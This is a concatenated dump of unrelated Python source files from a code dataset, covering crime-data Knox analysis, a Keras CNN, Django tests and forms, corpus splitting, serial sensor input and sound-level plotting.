assumed.\"\"\"\n    signif = significant_cells(np.asarray(pvalue_array), sig_thresh)\n    if selection == \"along_axis\":\n        # largest unbroken run of significant cells along each axis from the origin\n        sbw = signif.shape[0]-1 if signif[:,0].all() else int(np.argmin(signif[:,0]))-1\n        tbw = signif.shape[1]-1 if signif[0,:].all() else int(np.argmin(signif[0,:]))-1\n        return (sbw, tbw)\n    if selection == \"contig_to_axis\":\n        if not signif[0,0]:\n            return (-1, -1)\n        cells = np.argwhere(contiguous_cells(signif, origin=(0,0)))\n    else:  # \"contig_anywhere\"\n        cells = np.argwhere(signif)\n    if len(cells) == 0:\n        return (-1, -1)\n    return (int(cells[:,0].max()), int(cells[:,1].max()))\n\n\ndef plot_signif_knox_ratios(knox_entry, sbin_size, tbin_size, p_thresh=0.05):\n    # Reconstructed header: shade each significant (distance, time) cell by its\n    # Knox ratio. The figure setup here is an assumption.\n    num_sbins, num_tbins = knox_entry.ratios.shape\n    fig, ax = plt.subplots(figsize=(10, 5))\n    ax.set_xlim(0, num_sbins*sbin_size)\n    ax.set_ylim(0, num_tbins*tbin_size)\n    ax.set_xlabel(\"Distance (m)\")\n    ax.set_ylabel(\"Time (days)\")\n    mappable = matplotlib.cm.ScalarMappable(cmap=yellow_to_red)\n    mappable.set_array(knox_entry.ratios.ravel())\n    for sbin_index, tbin_index in product(range(num_sbins), range(num_tbins)):\n        if knox_entry.pvals[sbin_index, tbin_index] >= p_thresh:\n            continue\n        p = matplotlib.patches.Rectangle((sbin_index*sbin_size, tbin_index*tbin_size), sbin_size, tbin_size, fc=mappable.to_rgba(knox_entry.ratios[sbin_index,tbin_index]))\n        ax.add_patch(p)\n    \n    cbar = fig.colorbar(mappable, orientation=\"vertical\")\n    cbar.set_label(\"Knox ratio\")\n    \n\n\n\n\ndatadir = os.path.join(\"..\", \"..\", \"Data\")\nchicago_file_name = \"chicago_all_old.csv\"\nchicago_side = \"South\"\n#crime_type_set = {\"THEFT\"}\ncrime_type_set = {\"BURGLARY\"}\nchicago_file_path = os.path.join(datadir, chicago_file_name)\nchicago.set_data_directory(datadir)\n\n\n\n\nexp_limit = 100\nnum_time_bins = 10\nnum_dist_bins = 20\nnum_knox_iters = 100\nsbin_size = 100\ntbin_size = 7\n\nknox_file_path = os.path.join(datadir, \n                              \"knox_190330_sschi_burg_cell250_sbin100_tbin7_iter100.txt\")\nwith open(knox_file_path) as kf:\n    exp_num = -1\n    stype = \"lastline\"\n    sctr = 0\n    sdata = []\n    knox_data = []\n    for lnum, kline in enumerate(kf):\n        kline = kline.strip()\n        \n        #if stype != \"distribution\":\n        #    print(\"{}:{}:{}\".format(exp_num, lnum, kline))\n        #if lnum >50:\n        #    break\n        \n        \n        if len(kline)==0:\n            if stype == \"distribution\":\n                knox_data[-1].dists = np.asarray(sdata).reshape(num_dist_bins, num_time_bins, num_knox_iters)\n                knox_data[-1].medians = np.zeros((num_dist_bins, num_time_bins))\n                knox_data[-1].ratios = np.zeros((num_dist_bins, num_time_bins))\n                for i in range(num_dist_bins):\n                    for j in range(num_time_bins):\n                        knox_data[-1].medians[i][j] = statistics.median(knox_data[-1].dists[i][j])\n                knox_data[-1].ratios = knox_data[-1].stats/knox_data[-1].medians\n                \n                stype = \"lastline\"\n                continue\n            elif stype != \"lastline\":\n                print(\"Error, unexpected empty line at {}:{}\".format(exp_num, lnum))\n                sys.exit(1)\n            exp_num += 1\n            stype = \"info\"\n            sctr = 0\n            sdata = []\n            if exp_num >= exp_limit:\n                break\n            continue\n        \n        if stype == \"info\":\n            if kline == \"p values\":\n                
knox_data.append(KnoxEntry(*sdata))\n sdata = []\n sctr = 0\n stype = \"p values\"\n continue\n if sctr in [0,1]:\n sdata.append(np.datetime64(kline))\n elif sctr == 2:\n sdata.append(int(kline))\n else:\n print(\"Error, info section incorrect in part {}?\".format(exp_num))\n sys.exit(1)\n sctr += 1\n continue\n elif stype == \"p values\":\n if kline == \"statistics\":\n knox_data[-1].pvals = sdata\n sdata = []\n sctr = 0\n stype = \"statistics\"\n continue\n next_row = np.array([float(x) for x in kline.split()])\n if sctr == 0:\n sdata = next_row\n else:\n sdata = np.vstack([sdata, next_row])\n sctr += 1\n elif stype == \"statistics\":\n if kline == \"distribution\":\n knox_data[-1].stats = sdata\n sdata = []\n sctr = 0\n stype = \"distribution\"\n continue\n next_row = np.array([int(float(x)) for x in kline.split()])\n if sctr == 0:\n sdata = next_row\n else:\n sdata = np.vstack([sdata, next_row])\n sctr += 1\n elif stype == \"distribution\":\n sctr += 1\n \n # [...\n # start of dist for 1st cell in row\n if kline[0]==\"[\":\n kline = kline[1:]\n \n # ...] [...\n # end of one dist, start of another, in row\n elif \"] [\" in kline:\n kline = \" \".join(kline.split(\"] [\"))\n \n # ...]\n # end of dist for last cell in row\n elif kline[-1] == \"]\":\n kline = kline[:-1]\n \n # ...\n # typical line of numbers in middle of a dist\n else:\n pass\n \n sdata += [int(float(x)) for x in kline.split()]\n \n\nprint(\"\\# events per experiment\")\nfor exp in knox_data:\n print(\"{}:{}\".format(exp.start_date,exp.num_events))\n\nbandwidth_selections = [\"along_axis\", \"contig_to_axis\",\"contig_anywhere\"]\nbandwidth_pairs_dict = defaultdict(list)\nfor exp_num, exp in enumerate(knox_data):\n #print(\"Exp num {}\".format(exp_num))\n #print(exp.ratios)\n \n if exp_num<15:\n plot_signif_knox_ratios(exp, sbin_size, tbin_size, 0.05)\n \n \n for band_sel in bandwidth_selections:\n bandwidth_pairs_dict[band_sel].append(get_bandwidths_from_knox(exp.pvals, selection=band_sel))\n\n\n\n\nfig, ax = plt.subplots(figsize=(12,4))\nfor i, band_sel in enumerate(bandwidth_selections):\n ax.plot(np.linspace(2001, 2017.5, 34), [(x[0]+1+(.1*i))*sbin_size for x in bandwidth_pairs_dict[band_sel]])\nax.legend(bandwidth_selections)\nax.set_title(\"Spatial bandwidths determined by Knox, in meters\")\n\n\nfig, ax = plt.subplots(figsize=(12,4))\nfor i, band_sel in enumerate(bandwidth_selections):\n ax.plot(np.linspace(2001, 2017.5, 34), [(x[1]+1+(.1*i))*tbin_size/7 for x in bandwidth_pairs_dict[band_sel]])\nax.legend(bandwidth_selections)\nax.set_title(\"Temporal bandwidths determined by Knox, in weeks\")\n\n\n","sub_path":"sandbox/knoxAnalysisOrig.py","file_name":"knoxAnalysisOrig.py","file_ext":"py","file_size_in_byte":11483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"288148883","text":"import plotly.express as px\nfrom myproject import db\nfrom myproject.models import Animal\n\n\n\n\nanimals = Animal.query.all()\n\nfe =animals[0].feedEfficiency\nmp = animals[0].ch4_daily_mean\nwe = animals[0].waterEfficieny\n\nfig = px.bar(x=[\"Feed Efficieny\",\"Water Efficiency\", \"Methane Production\"], y =[fe, we,mp ])\nfig.update_layout(xaxis_type='category',\n title_text='Bar chart with categorical axes')\nfig.show()","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"603834917","text":"import setuptools\n\nwith open(\"README.md\", 
\"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"smartlogger\",\n version=\"0.0.1\",\n author=\"Blue Walkers Team\",\n author_email=\"bluewlkrs@gmail.com\",\n description=\"Easy smart logging for you python project\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/blue-walkers/smartlogger\",\n packages=setuptools.find_packages(),\n classifiers=(\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Development Status :: 1 - Planning\",\n \"Topic :: Scientific/Engineering :: Information Analysis\",\n \"Topic :: Software Development :: Build Tools\"\n ),\n install_requires=[\n \"certifi==2019.3.9\",\n \"chardet==3.0.4\",\n \"discord-webhook==0.4.1\",\n \"idna==2.8\",\n \"peewee==3.9.5\",\n \"requests==2.22.0\",\n \"urllib3==1.25.2\"\n ],\n zip_safe=False\n)\n","sub_path":"pypi_install_script/smartlogger-0.0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"222295252","text":"from django.test import TestCase, override_settings\n\nfrom ..models import PillowCheckpointSeqStore\nfrom ..utils import pillow_seq_store, EPSILON\n\n\ndef _get_dummy_pillow():\n from pillowtop.tests.utils import make_fake_constructed_pillow\n return make_fake_constructed_pillow('dummy pillow', 'test_checkpoint_seq_store')\n\nDummyPillow = _get_dummy_pillow\n\n\n@override_settings(PILLOWTOPS={'test': ['corehq.apps.hqadmin.tests.test_utils.DummyPillow']})\nclass TestPillowCheckpointSeqStore(TestCase):\n dependent_apps = ['pillowtop']\n\n def setUp(self):\n self.pillow = DummyPillow()\n\n def test_basic_cloudant_seq(self):\n seq = '1-blahblah'\n self.pillow.set_checkpoint({'seq': seq})\n pillow_seq_store()\n store = PillowCheckpointSeqStore.objects.get(checkpoint_id=self.pillow.checkpoint.checkpoint_id)\n self.assertEquals(store.seq, seq)\n\n def test_basic_couchdb_seq(self):\n seq = 100\n self.pillow.set_checkpoint({'seq': seq})\n pillow_seq_store()\n store = PillowCheckpointSeqStore.objects.get(checkpoint_id=self.pillow.checkpoint.checkpoint_id)\n self.assertEquals(store.seq, str(seq))\n\n def test_small_rewind(self):\n \"\"\"\n We should not notify if the seq is not significantly less than the previous\n \"\"\"\n seq = '10-blahblah'\n self.pillow.set_checkpoint({'seq': seq})\n pillow_seq_store()\n\n seq_rewind = '9-blahblah'\n self.pillow.set_checkpoint({'seq': seq_rewind})\n pillow_seq_store()\n\n store = PillowCheckpointSeqStore.objects.get(checkpoint_id=self.pillow.checkpoint.checkpoint_id)\n self.assertEquals(store.seq, seq_rewind)\n\n def test_large_rewind(self):\n \"\"\"\n We should notify if the seq is significantly less than the previous and not update the seq\n \"\"\"\n seq = '{}-blahblah'.format(EPSILON + 10)\n self.pillow.set_checkpoint({'seq': seq})\n pillow_seq_store()\n\n seq_rewind = '9-blahblah'\n self.pillow.set_checkpoint({'seq': seq_rewind})\n pillow_seq_store()\n\n store = PillowCheckpointSeqStore.objects.get(checkpoint_id=self.pillow.checkpoint.checkpoint_id)\n self.assertEquals(store.seq, seq)\n\n def test_get_by_pillow_name(self):\n seq = '10-blahblah'\n self.pillow.set_checkpoint({'seq': seq})\n pillow_seq_store()\n\n store = PillowCheckpointSeqStore.get_by_pillow_name('DummyPillow')\n self.assertIsNotNone(store)\n\n store = 
PillowCheckpointSeqStore.get_by_pillow_name('DummyPillowThatDoesNotExist')\n        self.assertIsNone(store)\n","sub_path":"corehq/apps/hqadmin/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"72910245","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\n\n\nfrom keras.preprocessing.sequence import TimeseriesGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv1D, GlobalAveragePooling1D,MaxPooling1D,Dropout\nimport keras\nfrom keras.utils import to_categorical\n\nfrom commons.path_ import listdir, get_dir_file, readCSV, abspath, readDF, saveDF, join, split_dir, readXLS\nfrom wangzifei.settings import origina_data_dir, tmp_data_dir, COM_LIST\nfrom wangzifei.load_data import load_day_info, load_min_info\nfrom wangzifei.make_data import make_dataSet\n\n\nfeature_col = [ 'open', 'high', 'low', 'close', 'volume', 'hold', 'strike']\nfeature_length = len(feature_col)\nlabel_col = 'label'\nhistory_length= 5\nbatch_size=100\n\n\ndef prepareCNN(df, history_length=history_length, batch_size=batch_size):\n\tdf[label_col] = df[label_col].astype(int)\n\t# The input data must be a 3D tensor, i.e. (samples, time_steps, features)\n\tdf = df[df[label_col] != 0]\n\tdata = df[feature_col].values\n\ttargets = df[label_col].values\n\ttargets = to_categorical(targets)\n\tts_gen = TimeseriesGenerator(data, targets,\n\t                             length=history_length, \n\t                             batch_size=batch_size)\n\n\treturn ts_gen\n\n\ndef buildCNN(batch_size=batch_size, history_length=history_length,feature_length = feature_length):\n\tmodel_m = Sequential()\n\tnum_classes = 2\n\tmodel_m.add(Conv1D(filters = 100, kernel_size = 2, activation='relu', input_shape=(history_length, feature_length)))\n\tmodel_m.add(Conv1D(filters = 100, kernel_size = 2, activation='relu'))\n\t# model_m.add(MaxPooling1D(feature_length))\n\t# model_m.add(Conv1D(100, 2, activation='relu'))\n\t# model_m.add(Conv1D(100, 2, activation='relu'))\n\tmodel_m.add(GlobalAveragePooling1D())\n\tmodel_m.add(Dropout(0.5))\n\tmodel_m.add(Dense(2, activation='softmax'))\n\n\tprint(model_m.summary())\n\treturn model_m\n\ndef compileCNN(model_m, gen=None,x_train=None, y_train=None, epochs=30, batch_size=batch_size):\n\tcallbacks_list = [\n\t    keras.callbacks.ModelCheckpoint(\n\t        filepath='best_model.{epoch:02d}-{acc:.2f}.h5',\n\t        monitor='acc',\n\t        save_best_only=True),\n\t    keras.callbacks.EarlyStopping(monitor='acc', patience=1)\n\t]\n\n\tmodel_m.compile(loss='categorical_crossentropy',\n\t    optimizer='adam', metrics=['accuracy'])\n\tif gen is not None:\n\t\thistory = model_m.fit_generator(generator=gen, epochs=epochs, verbose=2)\n\telse:\n\t\thistory = model_m.fit(x_train,\n                      y_train,\n                      batch_size=batch_size,\n                      epochs=epochs)\n\treturn history\n\n\ndef evaluate_result(model_m, x, y):\n\t# Print confusion matrix for training data\n\n\ty_pred_train = model_m.predict(x)\n\t# Take the class with the highest probability from the train predictions\n\tmax_y_pred_train = np.argmax(y_pred_train, axis=1)\n\tprint(classification_report(y, max_y_pred_train))\n\tplt = show_confusion_matrix(y, max_y_pred_train)\n\treturn plt\n\n\ndef plot_learning_curves(history):\n\tplt.figure(figsize=(6, 4))\n\tplt.plot(history.history['acc'], 'r', label='Accuracy of training data')\n\t# plt.plot(history.history['val_acc'], 'b', 
label='Accuracy of validation data')\n\tplt.plot(history.history['loss'], 'r--', label='Loss of training data')\n\t# plt.plot(history.history['val_loss'], 'b--', label='Loss of validation data')\n\tplt.title('Model Accuracy and Loss')\n\tplt.ylabel('Accuracy and Loss')\n\tplt.xlabel('Training Epoch')\n\tplt.ylim(0)\n\tplt.legend()\n\treturn plt\n\n\ndef show_confusion_matrix(y_true, y_pred, LABELS=None):\n matrix = metrics.confusion_matrix(y_true, y_pred)\n plt.figure(figsize=(6, 4))\n sns.heatmap(matrix,\n cmap='coolwarm',\n linecolor='white',\n linewidths=1,\n # xticklabels=LABELS,\n # yticklabels=LABELS,\n annot=True,\n fmt='d')\n plt.title('Confusion Matrix')\n plt.ylabel('True Label')\n plt.xlabel('Predicted Label')\n return plt\n\n\nif __name__ == \"__main__\":\n\tdf = make_dataSet()\n\t# history_length= 5\n\tN_samples, _ = df.shape\n\ttrain_df = df.iloc[:int(N_samples *0.8), :].copy()\n\ttest_df = df.iloc[int(N_samples * 0.8):,: ].copy()\n\n\ttrain_gen = prepareCNN(train_df, batch_size=1)\n\n\tX = []\n\tY = []\n\tfor i, X_Y_pair in enumerate(train_gen):\n\t\tx, y = X_Y_pair\n\t\tX.append(X_Y_pair[0])\n\t\tY.append(X_Y_pair[1])\n\n\tmodel_m = buildCNN(history_length=history_length, feature_length = feature_length)\n\t# history = compileCNN(model_m, x_train=X, y_train=Y)\n\thistory = compileCNN(model_m, gen=train_gen)\n\n\tplt = plot_learning_curves(history)\n\tprint(\"evaluate train result \")\n\tevaluate_result(model_m, X, Y)\n\n\n\ttest_gen = prepareCNN(test_df, batch_size=1)\n\n\tX = []\n\tY = []\n\tfor i, X_Y_pair in enumerate(test_gen):\n\t\tx, y = X_Y_pair\n\t\tX.append(X_Y_pair[0])\n\t\tY.append(X_Y_pair[1])\n\tprint(\"evaluate test result \")\n\tevaluate_result(model_m, X, Y)\n\tpass\n\n","sub_path":"wangzifei/run_model.py","file_name":"run_model.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"336851833","text":"##############################################################################\n# Claudia Schulz\n# November 2017\n#\n# take 30,000 tokens of each dataset and split this into 21,000 train and 9,000 dev (70%,30%)\n# take the rest of the dataset for test\n# and create pickled files for each dataset with different word embeddings\n##############################################################################\n\nimport os\nimport random\nimport logging\nfrom util.preprocessing import perpareDataset\n\n##############################################################################\ndef createSplits(dataFolder, resultFolder):\n with open(resultFolder + \"/train.txt\", 'w') as train,\\\n open(resultFolder + \"/dev.txt\", 'w') as dev,\\\n open(resultFolder + \"/test.txt\", 'w') as test:\n # create list of all available datapoints (annotated files)\n dataList = []\n for data in os.listdir(dataFolder):\n dataList.extend([data])\n #print(dataList)\n # shuffle the datapoints\n random.shuffle(dataList)\n dataPointCounter = 0\n\n # write (at least) 21000 tokens as training set\n tokenCounterTrain = 0\n while tokenCounterTrain <= 21000:\n dataPoint = dataList[dataPointCounter]\n with open(dataFolder + \"/\" + dataPoint, 'r') as text:\n for line in text:\n train.write(line)\n tokenCounterTrain +=1\n train.write(\"\\n\")\n dataPointCounter +=1\n\n dataFilesForTraining = dataPointCounter + 1\n print(\"Train set of \" + resultFolder + \" has size (no of tokens): \" + str(tokenCounterTrain) + \"\\n\")\n print(\"This used \" + str(dataFilesForTraining) + \" data files out of \" + 
str(len(dataList)) + \"\\n\")\n\n\n # write (at least) 9000 tokens as dev set\n tokenCounterDev = 0\n while tokenCounterDev <= 9000:\n dataPoint = dataList[dataPointCounter]\n with open(dataFolder + \"/\" + dataPoint, 'r') as text:\n for line in text:\n dev.write(line)\n tokenCounterDev +=1\n dev.write(\"\\n\")\n dataPointCounter +=1\n\n dataFilesForDev = dataPointCounter + 1 - dataFilesForTraining\n print(\"Dev set of \" + resultFolder + \" has size (no of tokens): \" + str(tokenCounterDev) + \"\\n\")\n print(\"This used \" + str(dataFilesForDev) + \" data files out of \" + str(len(dataList)) + \"\\n\")\n\n # write the rest as test set\n tokenCounterTest = 0\n while dataPointCounter < len(dataList):\n dataPoint = dataList[dataPointCounter]\n with open(dataFolder + \"/\" + dataPoint, 'r') as text:\n for line in text:\n test.write(line)\n tokenCounterTest +=1\n test.write(\"\\n\")\n dataPointCounter +=1\n\n dataFilesForTesting = dataPointCounter + 1 - dataFilesForTraining - dataFilesForDev\n print(\"Test set of \" + resultFolder + \" has size (no of tokens): \" + str(tokenCounterTest) + \"\\n\")\n print(\"This used \" + str(dataFilesForTesting) + \" data files out of \" + str(len(dataList)) + \"\\n\")\n\n print(\"In total, \" + str(dataPointCounter) + \" data files out of \"+ str(len(dataList)) + \" were used\")\n return\n\n\n##############################################################################\ndef pickleData(embeddingsPath, datasetName, dataColumns):\n datasetFiles = [(datasetName, dataColumns), ]\n pickleFile = perpareDataset(embeddingsPath, datasetFiles)\n\n\n\n##############################################################################\n##############################################################################\n\nabspath = os.path.abspath(__file__)\ndname = os.path.dirname(abspath)\nos.chdir(dname)\n\n# :: Logging level ::\nloggingLevel = logging.INFO\nlogger = logging.getLogger()\nlogger.setLevel(loggingLevel)\n\n#ch = logging.StreamHandler(sys.stdout)\nch = logging.FileHandler('singleArgExperimentsSmallData.log')\nch.setLevel(loggingLevel)\nformatter = logging.Formatter('%(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n# USER ACTION NEEDED\n# put BIO-labelled corpora here (in subfolders)\ndataPath = dname + \"/corpora\"\n\n# output path for train, dev, test splits (subfolders will be created for each corpus)\nresultPath = dname + \"/data_singleTask\"\n\n# USER ACTION NEEDED\n# put embeddings here (GloVe and [Komninos & Mandhar 2016])\nembeddingsPath = dname + \"/embeddings\"\n\n\nfor dataName in os.listdir(dataPath):\n dataFolder = dataPath + \"/\" + dataName\n print(dataName)\n if os.path.isdir(dataFolder):\n resultFolder = resultPath + \"/\" + dataName\n if not os.path.exists(resultFolder):\n os.makedirs(resultFolder, 0o777)\n createSplits(dataFolder, resultFolder)\n for embeddingsName in os.listdir(embeddingsPath):\n if embeddingsName == \"glove.txt\" or embeddingsName == \"wiki_extvec\":\n embeddingsFull = embeddingsPath + \"/\" + embeddingsName\n if os.path.isfile(embeddingsFull):\n print(embeddingsName)\n pickleData(embeddingsFull, dataName, {0:'tokens', 1:'arg_BIO'})\n\n","sub_path":"splitsAndPickle_singleTask.py","file_name":"splitsAndPickle_singleTask.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"165518539","text":"from pynput.keyboard import Key, Controller\nimport serial\nimport time\n\nserialPort = serial.Serial(port = \"COM9\", 
baudrate=9600)\nkeyboard = Controller()\n\nprint(\"Keep still!\")\ntime.sleep(2)\nline = serialPort.readline()\nbaseline = line.decode()\nbaseline = float(baseline)\n#thresholdUp = 20\n#threshold = 15\nprint(\"Done\")\nprint(baseline)\nflagDown = 0\nflagUp = 0\n\ndef getThreshold(serialPort, deltaTime, effortRatio=0.8):\n    starTime = time.time()\n    maxUp = -1\n    maxDown = 1\n\n    while time.time()-starTime < deltaTime:\n        # Reconstructed sampling loop (the original lines were lost in this\n        # copy): read one tilt angle per serial line, track the extremes seen.\n        line = serialPort.readline()\n        XAngle = float(line.decode())\n        if XAngle < maxDown:\n            maxDown = XAngle\n        if XAngle > maxUp:\n            maxUp = XAngle\n    thresholdUp = maxUp * effortRatio\n    thresholdDown = maxDown * effortRatio\n    return thresholdUp, thresholdDown\n\nthresholdUp, threshold = getThreshold(serialPort,5)\nthreshold = abs(threshold)\nprint(thresholdUp, \" \", threshold)\nwhile True:\n    line = serialPort.readline()\n    decodedLine = line.decode()\n    angle = float(decodedLine)\n    if angle < baseline-threshold and flagUp == 0:\n        # Reconstructed branch (lost in this copy): tilting past the lower\n        # threshold presses Up once; the exact condition is assumed.\n        print(\"up\")\n        keyboard.press(Key.up)\n        keyboard.release(Key.up)\n        flagUp = 1\n    if angle > baseline-threshold*0.1 and angle < baseline+threshold*0.1:\n        # Reconstructed: re-arm both keys once the angle settles near baseline.\n        flagUp = 0\n        flagDown = 0\n    if angle > baseline+threshold and flagDown ==0:\n        print(\"down\")\n        keyboard.press(Key.down)\n        keyboard.release(Key.down)\n\n        flagDown = 1\n","sub_path":"organised code/PythonScripts/readSerial.py","file_name":"readSerial.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"647496991","text":"\"\"\"\r\n    Quick and dirty way to grab images from ip cameras to make a time lapse video.\r\n    I wrote this to use with IP Webcam for Android, but it should work with any\r\n    cameras that have a single frame output.\r\n\r\n\r\n    ### Usage : Just run tldownload.py, then it will ask you for url and settings\r\n\r\n    IP Webcam for android has these urls :\r\n\r\n    - http://<ip>:8080/photo.jpg      Takes a regular photo with the camera\r\n    - http://<ip>:8080/photoaf.jpg    This one focuses first, then takes the photo (slower)\r\n    - http://<ip>:8080/shot.jpg       Grabs latest frame from video feed, with overlays etc\r\n\r\n    - Download IP Webcam for android : https://play.google.com/store/apps/details?id=com.pas.webcam&hl=en\r\n\r\n\"\"\"\r\n\r\nimport os\r\nimport urllib.request\r\nimport time\r\n\r\nimageUrl = str(input(\"Image url : \"))\r\ntotalImages = int(input(\"\\nHow many images ? \"))\r\nimageDelay = int(input(\"How many sec between images ? 
\"))\r\n\r\ndef download_image(url, imageNumber):\r\n outputImage = \"images\\\\\" + \"Image-\" + str(imageNumber) + \".jpg\"\r\n urllib.request.urlretrieve(url, outputImage)\r\n\r\n\r\ndef startTimelapse():\r\n totalRuntime = totalImages * imageDelay / 60\r\n imageNumber = 0\r\n\r\n try:\r\n os.mkdir(\"images\")\r\n print(\"Image folder created\")\r\n except FileExistsError:\r\n pass\r\n\r\n print(\"\\nNow downloading images for timelapse\\n\")\r\n print(\"Fetching : \" + str(totalImages) + \" images with \" + str(imageDelay) + \"sec delay\")\r\n print(\"Total runtime : \" + str(totalRuntime) + \" mins\\n\")\r\n\r\n while imageNumber < totalImages:\r\n download_image(imageUrl, imageNumber)\r\n print(\"downloaded : Image-\" + str(imageNumber))\r\n imageNumber += 1\r\n time.sleep(imageDelay)\r\n\r\n else:\r\n print(\"\\nAll images downloaded !\\n\")\r\n\r\nstartTimelapse()\r\n","sub_path":"tldownload.py","file_name":"tldownload.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"584556490","text":"from django import forms\nfrom decimal import Decimal\n\nfrom ..models import ProductReview, User, Product\n\nimport sys\n\nclass ReviewForm(forms.ModelForm):\n description = forms.CharField(widget=forms.Textarea, max_length=255, required=True)\n rating = forms.ChoiceField(required=True, choices=tuple((x, x) for x in range(6)))\n\n class Meta:\n model = ProductReview\n fields = ('description', 'rating')\n\n def clean_rating(self):\n rating = self.cleaned_data.get('rating')\n print(rating, file=sys.stderr)\n rating = Decimal(f\"{rating}.00\")\n return rating\n \n def __init__(self, *args, **kwargs):\n self._product_id = kwargs.pop('product_id', None)\n self._user_id = kwargs.pop('user_id', None)\n if (self._user_id is not None):\n self._user = User.objects.get(id=self._user_id)\n if (self._product_id is not None):\n self._product = Product.objects.get(id=self._product_id)\n\n super(ReviewForm, self).__init__(*args, **kwargs)\n\n def save(self, commit=True):\n review = super(ReviewForm, self).save(commit=False)\n review.user = self._user\n review.product = self._product\n\n if commit:\n review.save()\n\n return review","sub_path":"web/etsy/etsy_core/forms/reviewForms.py","file_name":"reviewForms.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"234356998","text":"#import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.pyplot\nimport matplotlib.mlab as mlab\nimport mysql.connector\nimport mysql.connector as mariadb\n#libf77blas.so.3: cannot open shared object file: No such file or directory\nimport math\n\ndef converte_dBA(f):\n aux = 0\n f_aux = []\n A_curve= [-30.2, -26.2, -22.5, -19.1, -16.1, -13.4, -10.9, -8.6, -6.6, -4.8, -3.2, -1.9, -0.8,\n 0, 0.6, 1, 1.2, 1.3, 1.2, 1, 0.5, -0.1, -1.1, -2.5]\n f_aux=f+A_curve\n for idx in f_aux:\n aux=aux + (10**(idx/10))\n \n dBA = 10*(np.log10(aux))\n return dBA\n\n\n\ndef main():\n\n x_ticks = (50, 63, 80, 100, 125, 160, 200, 250, 315, 400, 500, 630, 800, 1000, 1250, 1600, 2000, 2500, 3150, 4000,5000, 6300, 8000, 10000)\n\n y_ticks = np.arange(25, 121, 5)\n\n #cnx = mysql.connector.connect(user='pi19', password='unicamp2022',\n # host='192.168.15.52', port = '3306',\n # database='mapa_ruido')\n\n\n #mariadb_connection = mariadb.connect(user=\"pi19\",password=\"unicamp2022\",database=\"mapa_ruido\")\n 
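# converte_dBA (defined above) applies the A-weighting value per third-octave\n    # band and sums the band energies:\n    #   dBA = 10*log10( sum_i 10**((L_i + A_i)/10) )\n    # e.g. two bands at 60 dB with 0 dB weighting give 10*log10(2*10**6) ~ 63 dB.\n    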
#cursor=mariadb_connection.cursor()\n\n\n    #cursor=cnx.cursor()\n\n    loop=0\n    plt.figure(figsize=(20,10))\n    plt.xlabel('Frequencia')\n    plt.ylabel('dBSPL')\n    plt.title('Resposta em Frequencia')\n    #plt.ion()\n    \n    while (loop==0): \n        #plt.ion()\n\n        cnx = mysql.connector.connect(user='silvio', password='rasp10203040',\n                                      host='192.168.4.1', port = '3306',\n                                      database='mapa_ruido')\n\n        cursor=cnx.cursor()\n\n        \n        #idx=1\n        \n        # Chart\n        # Line chart\n        cursor.execute(\"SELECT * FROM dados1 ORDER BY medida DESC limit 4\")\n        results= cursor.fetchall()\n        results=np.array(results)\n\n        cursor.execute(\"SELECT * FROM dados2 ORDER BY medida DESC limit 4\")\n        results2=cursor.fetchall()\n        results2=np.array(results2)\n        \n        cursor.execute(\"SELECT * FROM dados3 ORDER BY medida DESC limit 4\")\n        results3=cursor.fetchall()\n        results3=np.array(results3)\n        \n        cursor.execute(\"SELECT * FROM dados4 ORDER BY medida DESC limit 4\")\n        results4=cursor.fetchall()\n        results4=np.array(results4)\n        r=np.average(results[:,1:25], axis=0)\n        r2=np.average(results2[:,1:25], axis=0)\n        r3=np.average(results3[:,1:25], axis=0)\n        r4=np.average(results4[:,1:25], axis=0)\n        \n        #cursor.execute(\"SELECT * FROM dados2 ORDER BY medida DESC limit 1\")\n        #results_2= cursor.fetchall()\n        #results_2=np.array(results_2)\n        \n        \n        plt.plot()\n        plt.plot(x_ticks,r , color='b', label= \"Sensor 1, dB(A)\"+str(round(converte_dBA(r),2)))\n        plt.plot(x_ticks, r2, color='r', label= \"Sensor 2, dB(A)\"+str(round(converte_dBA(r2),2)))\n        plt.plot(x_ticks, r3, color='g', label= \"Sensor 3, dB(A)\"+str(round(converte_dBA(r3),2)))\n        plt.plot(x_ticks,r4, color='magenta', label= \"Sensor 4, dB(A)\"+str(round(converte_dBA(r4),2)))\n        plt.xscale('log')\n        plt.grid(axis='y')\n        plt.grid(axis='x')\n        plt.xticks(x_ticks, x_ticks, rotation='45')\n        plt.yticks(y_ticks)\n        plt.legend(fontsize=15)\n        plt.xlabel('Frequencia')\n        plt.ylabel('dBSPL')\n        plt.title('Resposta em Frequencia, Data e Hora: '+str(results[0:1,25:26]))\n        #results=[]\n\n        \n        plt.draw()\n        plt.pause(1e-30)\n        